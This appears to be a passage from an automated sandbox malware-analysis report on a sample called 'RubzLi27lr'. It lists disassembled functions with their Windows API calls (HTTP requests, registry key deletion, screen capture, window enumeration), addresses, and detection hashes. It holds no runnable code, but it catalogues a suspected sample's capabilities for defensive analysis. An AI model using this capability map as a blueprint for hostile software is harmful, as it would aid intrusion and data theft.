                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B4923E
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B49255
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B49277
                                                                                                                  • DragFinish.SHELL32(?), ref: 00B4927E
                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B49371
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                  • API String ID: 221274066-3440237614
                                                                                                                  • Opcode ID: 8dfb45a226838bb938e05f20ebcc6c9175645eb246ce19519339112fc5898f4a
                                                                                                                  • Instruction ID: 8b55e04e4fbf910e711f9530f568372c61cf3743ca81c9858c0d45197a906222
                                                                                                                  • Opcode Fuzzy Hash: 8dfb45a226838bb938e05f20ebcc6c9175645eb246ce19519339112fc5898f4a
                                                                                                                  • Instruction Fuzzy Hash: 0B617571108301AFD701EF64DD85DABBBF8EF89750F00496EF696932A1DB309A09CB52
                                                                                                                  Function 00B2C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B2C4B0
                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B2C4C3
                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B2C4D7
                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B2C4F0
                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B2C533
                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B2C549
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B2C554
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B2C584
                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B2C5DC
                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B2C5F0
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B2C5FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3800310941-3916222277
                                                                                                                  • Opcode ID: 8a915d37552678d6596c09da5d8c900240b2f8a66abeed5914281fc1da7496cf
                                                                                                                  • Instruction ID: 81cd8caa572cd5544e7b7a3cbd5f17fe0c90592745088b44388bb53b984ce683
                                                                                                                  • Opcode Fuzzy Hash: 8a915d37552678d6596c09da5d8c900240b2f8a66abeed5914281fc1da7496cf
                                                                                                                  • Instruction Fuzzy Hash: 235169B4500618BFEB219FA0D989AAF7FFCFF19744F00445AF94A97210DB74EA049B60
                                                                                                                  Function 00B4856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00B48592
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485A2
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485AD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485BA
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B485C8
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485D7
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B485E0
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485E7
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485F8
                                                                                                                  • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00B4FC38,?), ref: 00B48611
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B48621
                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00B48641
                                                                                                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00B48671
                                                                                                                  • DeleteObject.GDI32(?), ref: 00B48699
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B486AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3840717409-0
                                                                                                                  • Opcode ID: 524493432612135c553676656f9041872a1d4059b71b2914baff8f127c565477
                                                                                                                  • Instruction ID: 26b1d6b8116135edfb9122ebcc54cadb36375f8c061b274781dce86ef27e6a71
                                                                                                                  • Opcode Fuzzy Hash: 524493432612135c553676656f9041872a1d4059b71b2914baff8f127c565477
                                                                                                                  • Instruction Fuzzy Hash: 4D411C75601204BFDB519FA9DC88EAE7BB8FF9AB11F114058F905E7260DB709E01DB60
                                                                                                                  Function 00B214BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00B21502
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00B2150B
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B21517
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B215FB
                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00B21657
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B21708
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00B2178C
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B217D8
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B217E7
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00B21823
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                  • API String ID: 1234038744-3931177956
                                                                                                                  • Opcode ID: d57ad223e8f1b7eb60a1e82cc93a744906cc398eec95ef73f46215d66b81fa64
                                                                                                                  • Instruction ID: 848b941bbeb9148df4fe9c75fb7157911f9e70c819220973b2718d134ad7c9dc
                                                                                                                  • Opcode Fuzzy Hash: d57ad223e8f1b7eb60a1e82cc93a744906cc398eec95ef73f46215d66b81fa64
                                                                                                                  • Instruction Fuzzy Hash: 90D1F171A00225DBDB009F69E985BB9B7F5FF65700F1088DAF40AAB291DB30DD41DB62
                                                                                                                  Function 00B3B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3B6F4
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B3B772
                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00B3B80A
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3B87E
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3B89C
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B3B8F2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B3B904
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B3B922
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B3B983
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3B994
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 146587525-4033151799
                                                                                                                  • Opcode ID: bb414629b7ce8882c5e9be5f12d273574c3ef34c454d8d918819d9a4f2b8ab77
                                                                                                                  • Instruction ID: 8a32acf4f76eb072ed1bfab52a07a400c71120d5b5fd83050adabdde564fffb4
                                                                                                                  • Opcode Fuzzy Hash: bb414629b7ce8882c5e9be5f12d273574c3ef34c454d8d918819d9a4f2b8ab77
                                                                                                                  • Instruction Fuzzy Hash: 14C17C34204201AFD714DF24C495F6ABBE5FF84318F24859CF59A8B2A2CB75ED45CB91
                                                                                                                  Function 00B3255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00B325D8
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B325E8
                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00B325F4
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00B32601
                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B3266D
                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B326AC
                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B326D0
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B326D8
                                                                                                                  • DeleteObject.GDI32(?), ref: 00B326E1
                                                                                                                  • DeleteDC.GDI32(?), ref: 00B326E8
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00B326F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                  • Opcode ID: 79a2deeb473760f24123a9f88387f86a87e5c7de463053f85cac0222c5c50819
                                                                                                                  • Instruction ID: d433fd969787538766ca51658f30ebea653b3edcd5a657cf52f6b2e36866236f
                                                                                                                  • Opcode Fuzzy Hash: 79a2deeb473760f24123a9f88387f86a87e5c7de463053f85cac0222c5c50819
                                                                                                                  • Instruction Fuzzy Hash: EA61E075D01219EFCF04CFA8D885AAEBBF6FF48710F208569E955A7250D770AA41CFA0
                                                                                                                  Function 00AEDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00AEDAA1
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED659
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED66B
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED67D
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED68F
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6A1
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6B3
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6C5
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6D7
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6E9
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6FB
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED70D
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED71F
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED731
                                                                                                                  • _free.LIBCMT ref: 00AEDA96
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AEDAB8
                                                                                                                  • _free.LIBCMT ref: 00AEDACD
                                                                                                                  • _free.LIBCMT ref: 00AEDAD8
                                                                                                                  • _free.LIBCMT ref: 00AEDAFA
                                                                                                                  • _free.LIBCMT ref: 00AEDB0D
                                                                                                                  • _free.LIBCMT ref: 00AEDB1B
                                                                                                                  • _free.LIBCMT ref: 00AEDB26
                                                                                                                  • _free.LIBCMT ref: 00AEDB5E
                                                                                                                  • _free.LIBCMT ref: 00AEDB65
                                                                                                                  • _free.LIBCMT ref: 00AEDB82
                                                                                                                  • _free.LIBCMT ref: 00AEDB9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 161543041-0
                                                                                                                  • Opcode ID: 02da672166a6b8261bcdabccff22c12a000fda20b3b8b21dcbced85c336de95d
                                                                                                                  • Instruction ID: e1872b229a64f07a9c8f534c129030102dc1717a8d49c20dc88ed4e06a5d7591
                                                                                                                  • Opcode Fuzzy Hash: 02da672166a6b8261bcdabccff22c12a000fda20b3b8b21dcbced85c336de95d
                                                                                                                  • Instruction Fuzzy Hash: 40318E326043889FEB21AB3AE946B5A77E8FF40354F125429F458DB192EF35ED40C720
                                                                                                                  Function 00B1365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B1369C
                                                                                                                  • _wcslen.LIBCMT ref: 00B136A7
                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B13797
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B1380C
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00B1385D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B13882
                                                                                                                  • GetParent.USER32(?), ref: 00B138A0
                                                                                                                  • ScreenToClient.USER32(00000000), ref: 00B138A7
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B13921
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B1395D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                  • String ID: %s%u
                                                                                                                  • API String ID: 4010501982-679674701
                                                                                                                  • Opcode ID: 936fcae28b12e9dce7eae130e64102e55d96c25b4757b2c20be38c62b17fb1d5
                                                                                                                  • Instruction ID: d35443911e37c255ea6b3a83fddb7bb601b464514c32eb163068735e59900051
                                                                                                                  • Opcode Fuzzy Hash: 936fcae28b12e9dce7eae130e64102e55d96c25b4757b2c20be38c62b17fb1d5
                                                                                                                  • Instruction Fuzzy Hash: 5891B471204606AFD719DF24C885FEAF7E8FF44B50F408569F99AD2190EB30EA85CB91
                                                                                                                  Function 00B14954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B14994
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B149DA
                                                                                                                  • _wcslen.LIBCMT ref: 00B149EB
                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00B149F7
                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00B14A2C
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B14A64
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B14A9D
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B14AE6
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B14B20
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B14B8B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                  • String ID: ThumbnailClass
                                                                                                                  • API String ID: 1311036022-1241985126
                                                                                                                  • Opcode ID: 7240a1c1e0be9786e0b749e5b785f8173e23f52928468a58970c9bcd1728fe2b
                                                                                                                  • Instruction ID: b796d76335c2f4efba6d5b1ed7bc8b4659843028173c6b00cbed4c3d3efe5d6e
                                                                                                                  • Opcode Fuzzy Hash: 7240a1c1e0be9786e0b749e5b785f8173e23f52928468a58970c9bcd1728fe2b
                                                                                                                  • Instruction Fuzzy Hash: ED919D710082059FDB04CF14C985BEA7BE8FF85754F4484AAFD8A9B196DB30ED85CBA1
                                                                                                                  Function 00B48D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B48D5A
                                                                                                                  • GetFocus.USER32 ref: 00B48D6A
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00B48D75
                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00B48E1D
                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B48ECF
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00B48EEC
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00B48EFC
                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B48F2E
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B48F70
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B48FA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1026556194-4108050209
                                                                                                                  • Opcode ID: d2752abc5733510daf373aa56c873bc8f0d4c4f7722b6f008781ffcdb1f66451
                                                                                                                  • Instruction ID: 4e1844d2d04be0bb4b11554a8a251604933f1bb8782d2646e998b11873853cdf
                                                                                                                  • Opcode Fuzzy Hash: d2752abc5733510daf373aa56c873bc8f0d4c4f7722b6f008781ffcdb1f66451
                                                                                                                  • Instruction Fuzzy Hash: E981DF71509311AFDB10CF24D884AAF7BE9FB89714F0009ADF98597291DF30DA05EBA2
                                                                                                                  Function 00B1DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B1DC20
                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B1DC46
                                                                                                                  • _wcslen.LIBCMT ref: 00B1DC50
                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00B1DCA0
